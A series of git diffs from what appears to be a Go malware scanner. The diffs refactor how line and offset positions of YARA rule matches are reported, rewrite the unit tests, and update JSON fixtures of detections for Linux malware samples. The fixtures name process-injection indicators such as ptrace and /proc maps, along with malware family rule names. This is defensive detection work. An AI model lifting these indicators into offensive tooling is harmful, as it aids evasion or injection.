-		Pledge:               fr.Pledge,
-		Capabilities:         fr.Capabilities,
-		FilteredBehaviors:    fr.FilteredBehaviors,
-		PreviousPath:         fr.PreviousPath,
-		PreviousRelPath:      fr.PreviousRelPath,
-		PreviousRelPathScore: fr.PreviousRelPathScore,
-		PreviousRiskScore:    fr.PreviousRiskScore,
-		PreviousRiskLevel:    fr.PreviousRiskLevel,
-		RiskScore:            fr.RiskScore,
-		RiskLevel:            fr.RiskLevel,
-		IsMalcontent:         fr.IsMalcontent,
-		Overrides:            fr.Overrides,
-		ArchiveRoot:          fr.ArchiveRoot,
-		FullPath:             fr.FullPath,
-		Behaviors:            make([]*malcontent.Behavior, 0),
-	}
-
-	// Process each behavior
-	for _, b := range fr.Behaviors {
-		if len(b.LineNumbers) <= 1 {
-			// If there's 0 or 1 line number, just copy the behavior as-is
-			newFR.Behaviors = append(newFR.Behaviors, b)
-		} else {
-			// Split into multiple behaviors, one per line number
-			for i, lineNum := range b.LineNumbers {
-				charOffset := 0
-				if i < len(b.CharOffsets) {
-					charOffset = b.CharOffsets[i]
-				}
-				newBehavior := &malcontent.Behavior{
-					Description:    b.Description,
-					MatchStrings:   b.MatchStrings,
-					LineNumbers:    []int{lineNum},
-					CharOffsets:    []int{charOffset},
-					RiskScore:      b.RiskScore,
-					RiskLevel:      b.RiskLevel,
-					RuleURL:        b.RuleURL,
-					ReferenceURL:   b.ReferenceURL,
-					RuleAuthor:     b.RuleAuthor,
-					RuleAuthorURL:  b.RuleAuthorURL,
-					RuleLicense:    b.RuleLicense,
-					RuleLicenseURL: b.RuleLicenseURL,
-					DiffAdded:      b.DiffAdded,
-					DiffRemoved:    b.DiffRemoved,
-					ID:             b.ID,
-					RuleName:       b.RuleName,
-					Override:       b.Override,
-				}
-				newFR.Behaviors = append(newFR.Behaviors, newBehavior)
-			}
-		}
-	}
-
-	return newFR
 }

--- a/pkg/render/json.go
+++ b/pkg/render/json.go
@@ -53,7 +53,6 @@ func (r JSON) Full(ctx context.Context, c *malcontent.Config, rep *malcontent.Re
 					// Filter out diff-related fields
 					r.ArchiveRoot = ""
 					r.FullPath = ""
-
 					jr.Files[path] = r
 				}
 			}

--- a/pkg/render/json_test.go
+++ b/pkg/render/json_test.go
@@ -12,12 +12,10 @@ import (
 func TestJSONLineInfoOutput(t *testing.T) {
 	tests := []struct {
 		name      string
-		lineInfo  bool
 		behaviors []*malcontent.Behavior
 	}{
 		{
-			name:     "Line info disabled - no line numbers",
-			lineInfo: false,
+			name: "Line info disabled - no line numbers",
 			behaviors: []*malcontent.Behavior{
 				{
 					ID:             "test/behavior",
@@ -32,8 +30,7 @@ func TestJSONLineInfoOutput(t *testing.T) {
 			},
 		},
 		{
-			name:     "Line info enabled - single line match",
-			lineInfo: true,
+			name: "Line info single line match",
 			behaviors: []*malcontent.Behavior{
 				{
 					ID:             "test/single",
@@ -48,8 +45,7 @@ func TestJSONLineInfoOutput(t *testing.T) {
 			},
 		},
 		{
-			name:     "Line info enabled - multi-line match",
-			lineInfo: true,
+			name: "Line info enabled - multi-line match",
 			behaviors: []*malcontent.Behavior{
 				{
 					ID:             "net/http",
@@ -65,8 +61,7 @@ func TestJSONLineInfoOutput(t *testing.T) {
 			},
 		},
 		{
-			name:     "Line info enabled - multiple behaviors",
-			lineInfo: true,
+			name: "Line info enabled - multiple behaviors",
 			behaviors: []*malcontent.Behavior{
 				{
 					ID:             "crypto/aes",
@@ -118,9 +113,7 @@ func TestJSONLineInfoOutput(t *testing.T) {
 			report.Files.Store("test.sh", fr)
 
 			// Create config
-			config := &malcontent.Config{
-				LineInfo: tt.lineInfo,
-			}
+			config := &malcontent.Config{}
 
 			// Render to JSON
 			var buf bytes.Buffer
@@ -170,22 +163,17 @@ func TestJSONLineInfoOutput(t *testing.T) {
 				}
 
 				// Check line info fields
-				if tt.lineInfo {
-					if behavior.StartingLine != expected.StartingLine {
-						t.Errorf("Behavior %d: StartingLine mismatch: expected %d, got %d", i, expected.StartingLine, behavior.StartingLine)
-					}
-					if behavior.EndingLine != expected.EndingLine {
-						t.Errorf("Behavior %d: EndingLine mismatch: expected %d, got %d", i, expected.EndingLine, behavior.EndingLine)
-					}
-					if behavior.StartingOffset != expected.StartingOffset {
-						t.Errorf("Behavior %d: StartingOffset mismatch: expected %d, got %d", i, expected.StartingOffset, behavior.StartingOffset)
-					}
-					if behavior.EndingOffset != expected.EndingOffset {
-						t.Errorf("Behavior %d: EndingOffset mismatch: expected %d, got %d", i, expected.EndingOffset, behavior.EndingOffset)
-					}
-				} else if behavior.StartingLine != 0 || behavior.EndingLine != 0 || behavior.StartingOffset != 0 || behavior.EndingOffset != 0 {
-					// When line info is disabled, all line fields should be 0
-					t.Errorf("Behavior %d: Expected all line info fields to be 0 when line info is disabled", i)
+				if behavior.StartingLine != expected.StartingLine {
+					t.Errorf("Behavior %d: StartingLine mismatch: expected %d, got %d", i, expected.StartingLine, behavior.StartingLine)
+				}
+				if behavior.EndingLine != expected.EndingLine {
+					t.Errorf("Behavior %d: EndingLine mismatch: expected %d, got %d", i, expected.EndingLine, behavior.EndingLine)
+				}
+				if behavior.StartingOffset != expected.StartingOffset {
+					t.Errorf("Behavior %d: StartingOffset mismatch: expected %d, got %d", i, expected.StartingOffset, behavior.StartingOffset)
+				}
+				if behavior.EndingOffset != expected.EndingOffset {
+					t.Errorf("Behavior %d: EndingOffset mismatch: expected %d, got %d", i, expected.EndingOffset, behavior.EndingOffset)
 				}
 			}
 		})

--- a/pkg/render/json_test.go
+++ b/pkg/render/json_test.go
@@ -1,0 +1,204 @@
+package render
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"testing"
+
+	"github.com/chainguard-dev/malcontent/pkg/malcontent"
+)
+
+func TestJSONLineNumberSplitting(t *testing.T) {
+	tests := []struct {
+		name          string
+		lineInfo      bool
+		behaviors     []*malcontent.Behavior
+		expectedCount int
+		expectedLines [][]int
+	}{
+		{
+			name:     "Line info disabled - no splitting",
+			lineInfo: false,
+			behaviors: []*malcontent.Behavior{
+				{
+					ID:          "test/behavior",
+					Description: "Test behavior",
+					LineNumbers: []int{10, 20, 30},
+					RiskScore:   2,
+					RiskLevel:   "MEDIUM",
+				},
+			},
+			expectedCount: 1,
+			expectedLines: [][]int{{10, 20, 30}},
+		},
+		{
+			name:     "Line info enabled - single line number",
+			lineInfo: true,
+			behaviors: []*malcontent.Behavior{
+				{
+					ID:          "test/single",
+					Description: "Single line behavior",
+					LineNumbers: []int{42},
+					RiskScore:   3,
+					RiskLevel:   "HIGH",
+				},
+			},
+			expectedCount: 1,
+			expectedLines: [][]int{{42}},
+		},
+		{
+			name:     "Line info enabled - multiple line numbers split",
+			lineInfo: true,
+			behaviors: []*malcontent.Behavior{
+				{
+					ID:           "net/http",
+					Description:  "HTTP connection",
+					LineNumbers:  []int{10, 25, 47},
+					MatchStrings: []string{"http://example.com"},
+					RiskScore:    2,
+					RiskLevel:    "MEDIUM",
+				},
+			},
+			expectedCount: 3,
+			expectedLines: [][]int{{10}, {25}, {47}},
+		},
+		{
+			name:     "Line info enabled - mixed behaviors",
+			lineInfo: true,
+			behaviors: []*malcontent.Behavior{
+				{
+					ID:          "crypto/aes",
+					Description: "AES encryption",
+					LineNumbers: []int{5, 15},
+					RiskScore:   1,
+					RiskLevel:   "LOW",
+				},
+				{
+					ID:          "net/socket",
+					Description: "Socket connection",
+					LineNumbers: []int{20},
+					RiskScore:   2,
+					RiskLevel:   "MEDIUM",
+				},
+				{
+					ID:          "exec/shell",
+					Description: "Shell execution",
+					LineNumbers: []int{30, 35, 40},
+					RiskScore:   3,
+					RiskLevel:   "HIGH",
+				},
+			},
+			expectedCount: 6, // 2 + 1 + 3
+			expectedLines: [][]int{{5}, {15}, {20}, {30}, {35}, {40}},
+		},
+		{
+			name:     "Line info enabled - empty line numbers",
+			lineInfo: true,
+			behaviors: []*malcontent.Behavior{
+				{
+					ID:          "test/no-lines",
+					Description: "No line numbers",
+					LineNumbers: []int{},
+					RiskScore:   1,
+					RiskLevel:   "LOW",
+				},
+			},
+			expectedCount: 1,
+			expectedLines: [][]int{{}},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			// Create a test file report
+			fr := &malcontent.FileReport{
+				Path:      "test.sh",
+				Size:      1024,
+				RiskScore: 3,
+				RiskLevel: "HIGH",
+				Behaviors: tt.behaviors,
+			}
+
+			// Create a test report
+			report := &malcontent.Report{}
+			report.Files.Store("test.sh", fr)
+
+			// Create config
+			config := &malcontent.Config{
+				LineInfo: tt.lineInfo,
+			}
+
+			// Render to JSON
+			var buf bytes.Buffer
+			renderer := NewJSON(&buf)
+
+			ctx := context.Background()
+			if err := renderer.Full(ctx, config, report); err != nil {
+				t.Fatalf("Failed to render JSON: %v", err)
+			}
+
+			// Parse the JSON output
+			var output Report
+			if err := json.Unmarshal(buf.Bytes(), &output); err != nil {
+				t.Fatalf("Failed to parse JSON output: %v", err)
+			}
+
+			// Check the file report
+			fileReport, exists := output.Files["test.sh"]
+			if !exists {
+				t.Fatal("Expected file report not found in output")
+			}
+
+			// Verify behavior count
+			if len(fileReport.Behaviors) != tt.expectedCount {
+				t.Errorf("Expected %d behaviors, got %d", tt.expectedCount, len(fileReport.Behaviors))
+			}
+
+			// Verify line numbers
+			for i, behavior := range fileReport.Behaviors {
+				if i < len(tt.expectedLines) {
+					if !equalIntSlices(behavior.LineNumbers, tt.expectedLines[i]) {
+						t.Errorf("Behavior %d: expected line numbers %v, got %v",
+							i, tt.expectedLines[i], behavior.LineNumbers)
+					}
+				}
+			}
+
+			// When line info is enabled and behaviors are split, verify that each
+			// behavior maintains the same properties except line numbers
+			if tt.lineInfo && len(tt.behaviors) > 0 && len(tt.behaviors[0].LineNumbers) > 1 {
+				firstOriginal := tt.behaviors[0]
+				for _, behavior := range fileReport.Behaviors {
+					if behavior.ID != firstOriginal.ID {
+						continue
+					}
+					if behavior.Description != firstOriginal.Description {
+						t.Errorf("Description mismatch: expected %q, got %q",
+							firstOriginal.Description, behavior.Description)
+					}
+					if behavior.RiskScore != firstOriginal.RiskScore {
+						t.Errorf("RiskScore mismatch: expected %d, got %d",
+							firstOriginal.RiskScore, behavior.RiskScore)
+					}
+					if behavior.RiskLevel != firstOriginal.RiskLevel {
+						t.Errorf("RiskLevel mismatch: expected %q, got %q",
+							firstOriginal.RiskLevel, behavior.RiskLevel)
+					}
+				}
+			}
+		})
+	}
+}
+
+func equalIntSlices(a, b []int) bool {
+	if len(a) != len(b) {
+		return false
+	}
+	for i := range a {
+		if a[i] != b[i] {
+			return false
+		}
+	}
+	return true
+}

--- a/pkg/render/json_test.go
+++ b/pkg/render/json_test.go
@@ -15,12 +15,12 @@ func TestJSONLineInfoOutput(t *testing.T) {
 		behaviors []*malcontent.Behavior
 	}{
 		{
-			name: "Line info disabled - no line numbers",
+			name: "Line info - no line numbers",
 			behaviors: []*malcontent.Behavior{
 				{
 					ID:             "test/behavior",
 					Description:    "Test behavior",
-					StartingLine:   0, // Should be 0 when line info is disabled
+					StartingLine:   0,
 					EndingLine:     0,
 					StartingOffset: 0,
 					EndingOffset:   0,
@@ -45,7 +45,7 @@ func TestJSONLineInfoOutput(t *testing.T) {
 			},
 		},
 		{
-			name: "Line info enabled - multi-line match",
+			name: "Line info - multi-line match",
 			behaviors: []*malcontent.Behavior{
 				{
 					ID:             "net/http",
@@ -61,7 +61,7 @@ func TestJSONLineInfoOutput(t *testing.T) {
 			},
 		},
 		{
-			name: "Line info enabled - multiple behaviors",
+			name: "Line info - multiple behaviors",
 			behaviors: []*malcontent.Behavior{
 				{
 					ID:             "crypto/aes",

--- a/pkg/report/report.go
+++ b/pkg/report/report.go
@@ -478,7 +478,7 @@ func Generate(ctx context.Context, path string, mrs *yarax.ScanResults, c malcon
 				matches = append(matches, p.Matches()...)
 			}
 
-			processor := newMatchProcessor(fc, matches, m.Patterns(), c.LineInfo)
+			processor := newMatchProcessor(fc, matches, m.Patterns())
 			matchResult = processor.process()
 			matchedStrings = matchResult.Strings
 		}

--- a/pkg/report/report.go
+++ b/pkg/report/report.go
@@ -484,14 +484,16 @@ func Generate(ctx context.Context, path string, mrs *yarax.ScanResults, c malcon
 		}
 
 		b := &malcontent.Behavior{
-			ID:           key,
-			MatchStrings: matchStrings(m.Identifier(), matchedStrings),
-			LineNumbers:  matchResult.LineNumbers,
-			CharOffsets:  matchResult.CharOffsets,
-			RiskLevel:    RiskLevels[risk],
-			RiskScore:    risk,
-			RuleName:     m.Identifier(),
-			RuleURL:      ruleURL,
+			ID:             key,
+			MatchStrings:   matchStrings(m.Identifier(), matchedStrings),
+			StartingLine:   matchResult.StartingLine,
+			EndingLine:     matchResult.EndingLine,
+			StartingOffset: matchResult.StartingOffset,
+			EndingOffset:   matchResult.EndingOffset,
+			RiskLevel:      RiskLevels[risk],
+			RiskScore:      risk,
+			RuleName:       m.Identifier(),
+			RuleURL:        ruleURL,
 		}
 
 		k := ""

--- a/pkg/report/report.go.bak
+++ b/pkg/report/report.go.bak
@@ -487,7 +487,6 @@ func Generate(ctx context.Context, path string, mrs *yarax.ScanResults, c malcon
 			ID:           key,
 			MatchStrings: matchStrings(m.Identifier(), matchedStrings),
 			LineNumbers:  matchResult.LineNumbers,
-			CharOffsets:  matchResult.CharOffsets,
 			RiskLevel:    RiskLevels[risk],
 			RiskScore:    risk,
 			RuleName:     m.Identifier(),

--- a/pkg/report/strings.go
+++ b/pkg/report/strings.go
@@ -59,17 +59,15 @@ type matchProcessor struct {
 	pool     *StringPool
 	matches  []yarax.Match
 	patterns []yarax.Pattern
-	lineInfo bool
 	mu       sync.Mutex
 }
 
-func newMatchProcessor(fc []byte, matches []yarax.Match, mp []yarax.Pattern, lineInfo bool) *matchProcessor {
+func newMatchProcessor(fc []byte, matches []yarax.Match, mp []yarax.Pattern) *matchProcessor {
 	return &matchProcessor{
 		fc:       fc,
 		pool:     NewStringPool(len(matches)),
 		matches:  matches,
 		patterns: mp,
-		lineInfo: lineInfo,
 	}
 }
 
@@ -134,9 +132,7 @@ func (mp *matchProcessor) process() *MatchResult {
 				*result = append(*result, mp.pool.Intern(string(matchBytes)))
 			}
 
-			if mp.lineInfo {
-				mp.updateLineInfo(o, l, &startingLine, &endingLine, &startingOffset, &endingOffset, &firstMatch)
-			}
+			mp.updateLineInfo(o, l, &startingLine, &endingLine, &startingOffset, &endingOffset, &firstMatch)
 		} else {
 			if patterns == nil || cap(patterns) < patternsCap {
 				patterns = make([]string, 0, patternsCap)
@@ -148,9 +144,7 @@ func (mp *matchProcessor) process() *MatchResult {
 			}
 			*result = append(*result, slices.Compact(patterns)...)
 
-			if mp.lineInfo {
-				mp.updateLineInfo(o, l, &startingLine, &endingLine, &startingOffset, &endingOffset, &firstMatch)
-			}
+			mp.updateLineInfo(o, l, &startingLine, &endingLine, &startingOffset, &endingOffset, &firstMatch)
 		}
 	}
 

--- a/pkg/report/strings_charoffset_test.go
+++ b/pkg/report/strings_charoffset_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 )
 
-func TestCalculateCharOffset(t *testing.T) {
+func TestGetLineInfo_CharOnly(t *testing.T) {
 	tests := []struct {
 		name     string
 		content  string
@@ -69,9 +69,15 @@ func TestCalculateCharOffset(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result := calculateCharOffset([]byte(tt.content), tt.offset)
-			if result != tt.expected {
-				t.Errorf("calculateCharOffset() = %v, want %v", result, tt.expected)
+			content := []byte(tt.content)
+			mp := &matchProcessor{
+				lineOffsets: computeLineOffsets(content),
+				fc:          content,
+			}
+
+			_, char := mp.getLineInfo(tt.offset)
+			if char != tt.expected {
+				t.Errorf("getLineInfo(%d).char = %d, want %d", tt.offset, char, tt.expected)
 			}
 		})
 	}
@@ -118,15 +124,18 @@ func TestCalculateLineNumberWithOffset(t *testing.T) {
 			name:     "out of bounds",
 			content:  "hello",
 			offset:   10,
-			expected: 0,
+			expected: 1,
 		},
 	}
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result := calculateLineNumber([]byte(tt.content), tt.offset)
-			if result != tt.expected {
-				t.Errorf("calculateLineNumber() = %v, want %v", result, tt.expected)
+			content := []byte(tt.content)
+			mp := &matchProcessor{fc: content, lineOffsets: computeLineOffsets(content)}
+
+			line, _ := mp.getLineInfo(tt.offset)
+			if line != tt.expected {
+				t.Errorf("getLineInfo(%d).line = %d, want %d", tt.offset, line, tt.expected)
 			}
 		})
 	}

--- a/pkg/report/strings_charoffset_test.go
+++ b/pkg/report/strings_charoffset_test.go
@@ -1,0 +1,133 @@
+package report
+
+import (
+	"testing"
+)
+
+func TestCalculateCharOffset(t *testing.T) {
+	tests := []struct {
+		name     string
+		content  string
+		offset   int
+		expected int
+	}{
+		{
+			name:     "beginning of file",
+			content:  "hello world",
+			offset:   0,
+			expected: 0,
+		},
+		{
+			name:     "middle of first line",
+			content:  "hello world",
+			offset:   6,
+			expected: 6,
+		},
+		{
+			name:     "beginning of second line",
+			content:  "hello\nworld",
+			offset:   6,
+			expected: 0,
+		},
+		{
+			name:     "middle of second line",
+			content:  "hello\nworld",
+			offset:   8,
+			expected: 2,
+		},
+		{
+			name:     "multiple lines",
+			content:  "line1\nline2\nline3",
+			offset:   13,
+			expected: 1,
+		},
+		{
+			name:     "empty lines",
+			content:  "line1\n\nline3",
+			offset:   7,
+			expected: 0,
+		},
+		{
+			name:     "offset at newline",
+			content:  "hello\nworld",
+			offset:   5,
+			expected: 5,
+		},
+		{
+			name:     "out of bounds offset",
+			content:  "hello",
+			offset:   10,
+			expected: 0,
+		},
+		{
+			name:     "negative offset",
+			content:  "hello",
+			offset:   -1,
+			expected: 0,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := calculateCharOffset([]byte(tt.content), tt.offset)
+			if result != tt.expected {
+				t.Errorf("calculateCharOffset() = %v, want %v", result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestCalculateLineNumberWithOffset(t *testing.T) {
+	tests := []struct {
+		name     string
+		content  string
+		offset   int
+		expected int
+	}{
+		{
+			name:     "first line",
+			content:  "hello world",
+			offset:   5,
+			expected: 1,
+		},
+		{
+			name:     "second line",
+			content:  "hello\nworld",
+			offset:   8,
+			expected: 2,
+		},
+		{
+			name:     "third line",
+			content:  "line1\nline2\nline3",
+			offset:   13,
+			expected: 3,
+		},
+		{
+			name:     "empty lines",
+			content:  "line1\n\nline3",
+			offset:   7,
+			expected: 3,
+		},
+		{
+			name:     "at newline",
+			content:  "hello\nworld",
+			offset:   5,
+			expected: 1,
+		},
+		{
+			name:     "out of bounds",
+			content:  "hello",
+			offset:   10,
+			expected: 0,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := calculateLineNumber([]byte(tt.content), tt.offset)
+			if result != tt.expected {
+				t.Errorf("calculateLineNumber() = %v, want %v", result, tt.expected)
+			}
+		})
+	}
+}

--- a/pkg/report/strings_test.go
+++ b/pkg/report/strings_test.go
@@ -1,0 +1,113 @@
+package report
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestCalculateLineNumber(t *testing.T) {
+	tests := []struct {
+		name     string
+		content  string
+		offset   int
+		expected int
+	}{
+		{
+			name:     "empty content",
+			content:  "",
+			offset:   0,
+			expected: 1,
+		},
+		{
+			name:     "first line",
+			content:  "hello world",
+			offset:   0,
+			expected: 1,
+		},
+		{
+			name:     "first line middle",
+			content:  "hello world",
+			offset:   6,
+			expected: 1,
+		},
+		{
+			name:     "second line",
+			content:  "hello\nworld",
+			offset:   6,
+			expected: 2,
+		},
+		{
+			name:     "third line",
+			content:  "hello\nworld\nfoo bar",
+			offset:   12,
+			expected: 3,
+		},
+		{
+			name:     "multiple newlines",
+			content:  "line1\nline2\nline3\nline4",
+			offset:   18,
+			expected: 4,
+		},
+		{
+			name:     "offset at newline",
+			content:  "hello\nworld",
+			offset:   5,
+			expected: 1,
+		},
+		{
+			name:     "offset beyond content",
+			content:  "hello",
+			offset:   100,
+			expected: 0,
+		},
+		{
+			name:     "negative offset",
+			content:  "hello",
+			offset:   -1,
+			expected: 0,
+		},
+		{
+			name:     "windows line endings",
+			content:  "hello\r\nworld\r\ntest",
+			offset:   14,
+			expected: 3,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := calculateLineNumber([]byte(tt.content), tt.offset)
+			if got != tt.expected {
+				t.Errorf("calculateLineNumber() = %v, want %v", got, tt.expected)
+			}
+		})
+	}
+}
+
+// Note: The TestMatchProcessorWithLineInfo and TestMatchProcessorWithUnprintableChars tests
+// have been removed because they relied on mocking yarax.Match and yarax.Pattern types,
+// which are concrete types from the yara-x library and cannot be mocked.
+// To properly test the matchProcessor functionality, we would need to either:
+// 1. Use actual yara-x rules and scanning, or
+// 2. Refactor the code to use interfaces that can be mocked
+//
+// For now, we focus on testing the calculateLineNumber function which doesn't depend on yara-x types.
+
+func BenchmarkCalculateLineNumber(b *testing.B) {
+	// Create a large file with many lines
+	lines := make([]string, 10000)
+	for i := range lines {
+		lines[i] = "This is a test line with some content"
+	}
+	content := []byte(strings.Join(lines, "\n"))
+
+	// Test various offsets
+	offsets := []int{100, 1000, 10000, 50000, 100000}
+
+	b.ResetTimer()
+	for b.Loop() {
+		for _, offset := range offsets {
+			_ = calculateLineNumber(content, offset)
+		}
+	}
+}

--- a/tests/linux/2024.kubo_injector/injector.json
+++ b/tests/linux/2024.kubo_injector/injector.json
@@ -17,6 +17,9 @@
                     "MatchStrings": [
                         "$elf_head"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 38,
+                    "EndingOffset": 158,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf",
@@ -28,6 +31,10 @@
                     "MatchStrings": [
                         "https://wiki.musl"
                     ],
+                    "StartingLine": 36,
+                    "EndingLine": 36,
+                    "StartingOffset": 443,
+                    "EndingOffset": 459,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -40,6 +47,10 @@
                         "https://",
                         "x86_64"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 36,
+                    "StartingOffset": 808,
+                    "EndingOffset": 1047,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -52,6 +63,10 @@
                         "https://",
                         "linux"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 36,
+                    "StartingOffset": 802,
+                    "EndingOffset": 450,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref",
@@ -67,6 +82,10 @@
                         "/proc",
                         "maps"
                     ],
+                    "StartingLine": 25,
+                    "EndingLine": 38,
+                    "StartingOffset": 747,
+                    "EndingOffset": 44,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#library_injector",
@@ -80,6 +99,10 @@
                         "process",
                         "ptrace"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 42,
+                    "StartingOffset": 2605,
+                    "EndingOffset": 2345,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace_injector_unknown",
@@ -91,6 +114,10 @@
                     "MatchStrings": [
                         "dlsym"
                     ],
+                    "StartingLine": 36,
+                    "EndingLine": 36,
+                    "StartingOffset": 1348,
+                    "EndingOffset": 1358,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym",
@@ -103,6 +130,10 @@
                     "MatchStrings": [
                         "waitpid"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 42,
+                    "StartingOffset": 2763,
+                    "EndingOffset": 2403,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid",
@@ -115,6 +146,10 @@
                     "MatchStrings": [
                         "readlink"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 42,
+                    "StartingOffset": 2612,
+                    "EndingOffset": 1424,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink",
@@ -129,6 +164,10 @@
                         "/proc/%d/root",
                         "/proc/%s/exe"
                     ],
+                    "StartingLine": 26,
+                    "EndingLine": 38,
+                    "StartingOffset": 1,
+                    "EndingOffset": 52,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary",
@@ -140,6 +179,10 @@
                     "MatchStrings": [
                         "/proc/%d/maps"
                     ],
+                    "StartingLine": 36,
+                    "EndingLine": 36,
+                    "StartingOffset": 1639,
+                    "EndingOffset": 1651,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-maps.yara#proc_maps",
@@ -151,6 +194,10 @@
                     "MatchStrings": [
                         "realpath"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 42,
+                    "StartingOffset": 2537,
+                    "EndingOffset": 2027,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath",
@@ -165,6 +212,10 @@
                         "address",
                         "offset"
                     ],
+                    "StartingLine": 36,
+                    "EndingLine": 42,
+                    "StartingOffset": 777,
+                    "EndingOffset": 2663,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/overflow-shellcode.yara#exploit",
@@ -180,6 +231,10 @@
                         "remote_vcall",
                         "arch2name"
                     ],
+                    "StartingLine": 36,
+                    "EndingLine": 42,
+                    "StartingOffset": 204,
+                    "EndingOffset": 2796,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/malware/family/kubo_injector.yara#kubo",
@@ -192,6 +247,10 @@
                     "MatchStrings": [
                         "https://wiki.musl-libc.org/functional-differences-from-glibc.html"
                     ],
+                    "StartingLine": 36,
+                    "EndingLine": 36,
+                    "StartingOffset": 443,
+                    "EndingOffset": 507,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url",
@@ -203,6 +262,10 @@
                     "MatchStrings": [
                         "seccomp"
                     ],
+                    "StartingLine": 36,
+                    "EndingLine": 36,
+                    "StartingOffset": 808,
+                    "EndingOffset": 814,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp",

--- a/tests/linux/2024.vncjew/__min__c.json
+++ b/tests/linux/2024.vncjew/__min__c.json
@@ -52,6 +52,10 @@
                         "getrandom",
                         "GetRandom"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 20104,
+                    "StartingOffset": 10078,
+                    "EndingOffset": 597,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -67,6 +71,10 @@
                         "oIp",
                         "IP"
                     ],
+                    "StartingLine": 1296,
+                    "EndingLine": 14371,
+                    "StartingOffset": 3545,
+                    "EndingOffset": 8,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention",
@@ -78,6 +86,10 @@
                     "MatchStrings": [
                         "http://invalidlookup"
                     ],
+                    "StartingLine": 4481,
+                    "EndingLine": 4481,
+                    "StartingOffset": 707,
+                    "EndingOffset": 726,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -89,6 +101,10 @@
                     "MatchStrings": [
                         "1.1.1.1"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 133506,
+                    "EndingOffset": 134406,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#cloudflare_dns_ip",
@@ -104,6 +120,10 @@
                         "arm64",
                         "x86"
                     ],
+                    "StartingLine": 4481,
+                    "EndingLine": 20089,
+                    "StartingOffset": 707,
+                    "EndingOffset": 12,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -116,6 +136,10 @@
                         "http://",
                         "linux"
                     ],
+                    "StartingLine": 4479,
+                    "EndingLine": 20088,
